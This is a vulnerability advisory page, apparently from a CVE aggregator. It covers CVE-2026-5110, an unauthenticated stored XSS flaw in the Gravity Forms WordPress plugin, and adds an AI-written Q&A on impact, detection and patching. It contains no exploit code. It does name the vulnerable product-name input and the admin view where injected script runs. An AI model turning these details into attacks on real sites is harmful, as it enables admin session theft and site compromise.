CVE-2026-5110
Deferred Deferred - Pending Action
Unauthenticated Stored XSS in Gravity Forms WordPress Plugin

Publication date: 2026-05-02

Last updated on: 2026-05-05

Assigner: Wordfence

Description
The Gravity Forms plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting in versions up to and including 2.10.0. This is due to insufficient input validation and output escaping in the SingleProduct field when used inside a Repeater field. When SingleProduct fields are nested within Repeater fields, the validation flow bypasses the state validation mechanism (failed_state_validation()) that would normally prevent tampering with field values. The validate_subfield() method only calls the field's validate() method, which for SingleProduct fields only validates the quantity field and does not check the product name field for tampering. As a result, an attacker can inject arbitrary HTML and JavaScript into the product name field (input .1). This malicious input is then saved to the database without sanitization because sanitize_entry_value() returns raw values when HTML is not expected for the field type. When an administrator views the entry in wp-admin/admin.php?page=gf_entries, the get_value_entry_detail() method outputs the product name without escaping, causing the stored XSS payload to execute in the administrator's browser. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrator accesses an entry containing the malicious payload.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-05-02
Last Modified
2026-05-05
Generated
2026-05-07
AI Q&A
2026-05-02
EPSS Evaluated
2026-05-05
NVD
CVE-2026-5110
EUVD
EUVD-2026-26742
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
gravity_forms gravity_forms to 2.10.0 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

The Gravity Forms plugin for WordPress has a vulnerability called Unauthenticated Stored Cross-Site Scripting (XSS) in versions up to and including 2.10.0. This happens because the plugin does not properly validate and escape input in the SingleProduct field when it is used inside a Repeater field.

Specifically, when SingleProduct fields are nested within Repeater fields, the usual validation that prevents tampering is bypassed. The validation method only checks the quantity field but not the product name field, allowing an attacker to inject malicious HTML or JavaScript into the product name.

This malicious input is saved directly to the database without sanitization. When an administrator views the affected entry in the WordPress admin panel, the malicious script executes in their browser, potentially compromising their session or system.


How can this vulnerability impact me? :

This vulnerability allows unauthenticated attackers to inject malicious scripts into Gravity Forms entries that execute in the browser of any administrator who views the entry.

The impact includes potential theft of administrator session cookies, unauthorized actions performed with administrator privileges, and possible compromise of the WordPress site or server.

Because the attack requires no authentication, it increases the risk of exploitation and can lead to significant security breaches.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

The vulnerability allows unauthenticated attackers to inject arbitrary HTML and JavaScript into the product name field, which is then stored in the database and executed in an administrator's browser. This stored cross-site scripting (XSS) flaw can lead to unauthorized access or manipulation of administrative functions and potentially sensitive data.

Such unauthorized script execution and potential data exposure could impact compliance with standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and ensure data integrity and confidentiality.

However, the provided context does not explicitly mention compliance impacts or specific regulatory considerations.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability involves unauthenticated stored cross-site scripting in the Gravity Forms WordPress plugin versions up to 2.10.0, specifically in the SingleProduct field nested inside a Repeater field. Detection would involve identifying if your WordPress installation is running a vulnerable version of the Gravity Forms plugin and checking for suspicious or malicious input in the SingleProduct fields within entries.

Since the vulnerability is triggered when an administrator views an entry containing malicious payloads in wp-admin, detection on the system could include reviewing database entries for unexpected HTML or JavaScript in product name fields of Gravity Forms entries.

There are no specific commands provided in the available resources to detect this vulnerability directly on your network or system.


What immediate steps should I take to mitigate this vulnerability?

The vulnerability affects Gravity Forms plugin versions up to and including 2.10.0. Immediate mitigation involves updating the Gravity Forms plugin to a version later than 2.10.0 where this vulnerability is fixed.

Since the vulnerability allows unauthenticated stored cross-site scripting via the SingleProduct field inside Repeater fields, it is critical to apply the update to prevent attackers from injecting malicious scripts that execute in administrator browsers.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart